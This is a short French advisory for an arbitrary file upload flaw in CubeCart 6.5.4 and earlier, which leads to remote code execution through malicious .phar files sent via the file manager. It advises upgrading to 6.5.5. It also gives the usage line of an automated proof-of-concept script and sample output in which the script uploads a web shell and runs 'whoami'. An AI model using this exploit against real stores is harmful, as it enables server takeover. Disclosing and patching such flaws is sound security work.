
CubeCart <= 6.5.4 est vulnérable à un téléchargement arbitraire de fichiers qui conduit à une exécution de code à distance (RCE).
CubeCart <= 6.5.4 est vulnérable à un problème de téléchargement arbitraire de fichier qui conduit à une exécution de code à distance (RCE). La vulnérabilité affecte le gestionnaire de fichiers de l'application et ses filtres en permettant aux attaquants de télécharger des fichiers .phar contenant du code malveillant. CubeCart doit être mis à jour vers la version 6.5.5 qui implémente un correctif de sécurité pour corriger cette vulnérabilité.
Pour plus de détails, veuillez consulter l'annonce officielle de CubeCart dans les références.
Un proof-of-concept (PoC) automatisé a été créé, mais cette vulnérabilité peut également être exploitée manuellement en téléchargeant un fichier .phar malveillant via le gestionnaire de fichiers.
Voici l'utilisation du PoC :
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
Après exécution, voici le résultat attendu pour une exploitation réussie :
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data